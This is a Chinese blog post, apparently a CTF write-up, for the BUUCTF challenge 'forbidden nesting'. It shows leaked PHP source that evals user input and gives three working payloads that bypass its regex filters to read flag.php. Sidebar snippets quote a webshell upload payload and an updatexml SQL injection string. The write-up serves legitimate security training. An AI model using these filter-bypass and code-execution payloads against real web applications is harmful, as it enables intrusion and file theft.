[BUUCTF刷题]禁止套娃

最新推荐文章于 2024-04-06 17:42:22 发布
最新推荐文章于 2024-04-06 17:42:22 发布
阅读量2.1k 收藏 12
点赞数 5
分类专栏: buuctf刷题
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43952190/article/details/107061554
版权

禁止套娃

  1. exp=show_source(next(array_reverse(scandir(pos(localeconv())))));
  2. exp=show_source(array_rand(array_flip(scandir(pos(localeconv())))));
  3. exp=show_source(session_id(session_start()));
  1. 进入后显示flag在哪儿,找不到线索,进行目录扫描。但也没有扫到。查看别人的wp发现是.git泄露。但是自己的网址下/.git/显示403,所以即使目录扫描也扫不出来。
  2. 使用GitHack.py下载源码
    在这里插入图片描述
  3. 得到index.php源码
<?php
include "flag.php";
echo "flag在哪里呢?<br>";
if(isset($_GET['exp'])){
    if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])) {
        if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['exp'])) {
            if (!preg_match('/et|na|info|dec|bin|hex|oct|pi|log/i', $_GET['exp'])) {
                // echo $_GET['exp'];
                @eval($_GET['exp']);
            }
            else{
                die("还差一点哦!");
            }
        }
        else{
            die("再好好想想!");
        }
    }
    else{
        die("还想读flag,臭弟弟!");
    }
}
// highlight_file(__FILE__);
?>
  • 可以通过get一个exp参数,如果符合条件或者绕过限制,就可以执行。
  • 过滤了伪协议读取方式。
  • (?R)引用当前表达式,后面加了?递归调用。只能匹配通过无参数的函数。
  • 过滤了et|na|info|dec|bin|hex|oct|pi|log关键字。
  1. 根据源码可以知道flag就在flag.php中,然后exp要符合无参数的函数,但是可以套函数,也符合题目名称。

scandir(’.’):扫描当前目录
localeconv() 函数返回一包含本地数字及货币格式信息的数组。而数组第一项就是.
pos(),current():返回数组第一个值

  • 所以构造exp=print_r(scandir(pos(localeconv())));
    在这里插入图片描述

//数组操作函数:

  1. end():数组指针指向最后一位
  2. next(): 数组指针指向下一位
  3. array_reverse(): 将数组颠倒
  4. array_rand(): 随机返回数组的键名
  5. array_flip():交换数组的键和值

读取文件函数

  1. file_get_content() :因为et被ban,所以不能使用
  2. readfile()
  3. highlight_file()
  4. show_source()

方法一:
使用使上述文件数组反转后取next位即flag.php。然后读取文件
构造exp=show_source(next(array_reverse(scandir(pos(localeconv())))));
方法二:
同上述方法,但方法一有局限性,只能得到数组的第二位或者倒数第二位。其他情况可以使用随机返回键名的方法(刷新几次就可以得到):
exp=show_source(array_rand(array_flip(scandir(pos(localeconv())))));
在这里插入图片描述
方法三:

session_start(): 告诉PHP使用session;
session_id(): 获取到当前的session_id值;
手动设置cookie中PHPSESSID=flag.php;

所以可以构造exp=show_source(session_id(session_start()));
在这里插入图片描述

marsxu626
关注
  • 5
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTF刷题系列
qq_45655564的博客
07-11 480
[HCTF 2018]WarmUp 查看网页源代码,得到source.php 可以得到 <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { $whitelist = ["source"=>"source.php","hint"=>"hint.php"];
labuladong的刷题笔记V2.0
09-17
贪心算法如俄罗斯套娃信封问题,展示了如何通过局部最优解达到全局最优。回溯算法则用于解决组合问题,如N皇后问题、括号生成等。 链表是另一个核心主题,包括单链表、双链表、环形链表等。笔记涵盖了链表的基本...
BUUCTF刷题笔记[GXYCTF2019]禁止套娃
devilare的博客
07-02 316
[GXYCTF2019]禁止套娃 打开题目,啥也没有 F12,抓包啥也没有,扫描一下,dirscher-master扫描不出来,用一下git hack,得到源码: <?php include "flag.php"; echo "flag在哪里呢?<br>"; if(isset($_GET['exp'])){ if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])) {
【Web】纯萌新的BUUCTF刷题日记Day1
最新发布
uuzeray的博客
04-06 1187
刚学会F12看源码,每天做个一页题,吃嘛嘛香。
BUUCTF刷题记录(5)
bmth666的博客
01-13 1694
文章目录web[GXYCTF2019]BabyUpload[网鼎杯 2018]Comment web 打ctf(×) 被ctf打(√) [GXYCTF2019]BabyUpload 过滤了htaccess,ph后缀,还限制了<?php,所以只能用: GIF89a <script language="php">@eval($_POST['pass']);</script&gt...
BUUCTF刷题记录(7)
bmth666的博客
10-16 1978
文章目录web[NPUCTF2020]ReadlezPHP web 打ctf(×) 被ctf打(√) [NPUCTF2020]ReadlezPHP 我反序列化真不行,需要多理解理解这方面的内容。 打开用view-source:查看源码,得到信息 进入得到代码,为反序列化 <?php #error_reporting(0); class HelloPhp { public $a; ...
BUUCTF刷题记录(持续更新中~)
热门推荐
xiaolong22333的博客
04-03 5万+
之前陆陆续续做过一些题,但都没有记录,这次打算巩固一下,记录下来。 .
BUUCTF刷题记录(3)
bmth666的博客
03-20 3299
web [SWPU2019]Web1 [ASIS 2019]Unicorn shop [ACTF2020 新生赛]Include [安洵杯 2019]easy_web [WesternCTF2018]shrine [ACTF2020 新生赛]Exec [GXYCTF2019]禁止套娃 方法一:array_flip()和array_rand() 方法二:array_reverse() 方法三:使用session [GXYCTF2019]BabySQli [CISCN 2019 初赛]Love Math
BUUCTF刷题记录(第一页和第二页部分题)
weixin_51943950的博客
05-15 659
这个 晚上总算补完了所有的简易wp,二刷了一部分题目。 小白做题,大佬勿喷。。 [极客大挑战 2019]EasySQL 猜对用户名admin,判断密码框存在注入,直接万能密码,或者随意查询一下 [HCTF 2018]WarmUp 代码审计典型例题,两个if判断需要false,最后一个需要true,最后通过文件包含漏洞查看,还是较为简单的题目 [极客大挑战 2019]Havefun …就传个参 [ACTF2020 新生赛]Include 文件包含 伪协议 [强网杯 2019]随便注 本题
buuctf刷题之旅之web(一)
qq_50589021的博客
08-17 4905
2021-01-15 第一题:[HCTF 2018]WarmUp 这里懒得上传图片了,所以就直接笔记了 源代码里面有1.source.php,所以打开以后还会发先2.hint.php 1打开后会发现是代码审计 <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { $whitelist = ["s
俄罗斯套娃奖品Java程序
08-12
标题中的“俄罗斯套娃奖品Java程序”表明这是一个使用Java编程语言实现的程序,它可能与俄罗斯套娃这种玩具的概念相结合,创建出一种趣味性的计算模型或者游戏。俄罗斯套娃通常指的是一个大娃娃里面装着小一点的同款...
俄罗斯套娃奖品C++程序
05-19
在IT领域,编程竞赛是一种锻炼和展示编程技巧的常见方式,而“俄罗斯套娃奖品C++程序”就是一个这样的例子,它曾出现在中兴通信公司的“捧月杯”编程竞赛中。这个程序的设计和实现利用了C++这门强大的编程语言,展示...
俄罗斯套娃
04-17
"俄罗斯套娃"这个标题可能是指一种特殊的数据处理或存储方式,它借鉴了传统玩具俄罗斯套娃的概念。在信息技术领域,这种比喻可能用于描述一种数据结构或者编程技巧,其中数据被嵌套在一个又一个的层次中,每个层级都...
俄罗斯套娃程序及设计
06-09
【俄罗斯套娃程序及设计】是一种特殊的算法应用,主要用于寻找最佳路径或解决方案。在这个特定的实现中,程序设计用于处理二维矩阵数据,可能是为了解决寻路问题或者优化问题。以下是这个算法的关键点: 1. **递归...
CTF模板注入
weixin_43952190的博客
07-30 4192
模板注入赛题 1. [护网杯 2018]easy_tornado 进入后三个链接 /flag.txt # flag in /fllllllllllllag /welcome.txt #提示render(渲染) /hint.txt #提示md5(cookie_secret+md5(filename)) url上两个参数:filename&filehash 根据提示,要查看flag,已经知道了文件名,filehash也知道了构
[BUUCTF][GYCTF2020]Ezsqli
weixin_43952190的博客
07-26 2623
[GYCTF2020]Ezsqli 布尔盲注 无列名盲注 抓包,存在post的id参数。 进行测试 id=1时, :Nu1L id=0时, :Error Occured When Fetch Result. id=1’时, :bool(false) id=1’#时,:bool(false) 语句不正确时返回bool(false) 所以猜测是数字型的注入 id=1^1 :Error Occured When Fetch Result. id=1^0 :Nu1L 存在sql注入。
[BUUCTF刷题]HardSQL
weixin_43952190的博客
07-03 2021
HardSQL 进入后是sql注入页面,过滤了一些字符,先进行fuzz测试。 发现过滤了union,双写也无法绕过,所以不能使用常规的方法进行注入。但发现没有过滤extractvalue和updatexml。 也过滤了空格,使用括号绕过。 首先,注数据库名称 username=admin'or(updatexml(1,concat(0x7e,(SELECT(database())),0x7e),1))%23&password=1 然后得到表名(过滤=,使用like) userna
buuctf_安洵杯 2019_easy_web
weixin_43952190的博客
07-01 1422
安洵杯 2019_easy_web 进入后页面显示如下 查看源代码: 发现一长串base64编码的数据,然后进行解码发现是png图片的内容信息。 地址.../index.php?img=TXpVek5UTTFNbVUzTURabE5qYz0&cmd= 对TXpVek5UTTFNbVUzTURabE5qYz0进行两次base64解密,一次hex2bin解密得到555.png。 想必上面显示的那张图片就是555.png,然后源代码里面显示的数据就是该图片的内容,即在参数img中输入一次he
俄罗斯套娃c语言程序
02-15
俄罗斯套娃是一种传统的俄罗斯玩具,它由一组套在一起的木质人偶组成,每个人偶都可以打开,里面还有一个更小的人偶。如果你想在C语言中实现俄罗斯套娃程序,你可以使用结构体和指针来表示套娃的层次结构。 首先,你可以定义一个结构体来表示一个套娃人偶,其中包含一个指向更小人偶的指针。例如: ```c struct Doll { int size; struct Doll* smaller_doll; }; ``` 然后,你可以创建一组套娃人偶对象,并将它们连接起来形成套娃的层次结构。例如: ```c struct Doll doll1 = { 1, NULL }; struct Doll doll2 = { 2, &doll1 }; struct Doll doll3 = { 3, &doll2 }; // 依此类推... ``` 在这个例子中,doll3 是最外层的人偶,它包含了指向 doll2 的指针,而 doll2 又包含了指向 doll1 的指针。 最后,你可以通过遍历套娃的层次结构来打印出每个人偶的大小。例如: ```c struct Doll* current_doll = &doll3; while (current_doll != NULL) { printf("Doll size: %d\n", current_doll->size); current_doll = current_doll->smaller_doll; } ``` 这样,你就可以按照从外到内的顺序打印出每个人偶的大小。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值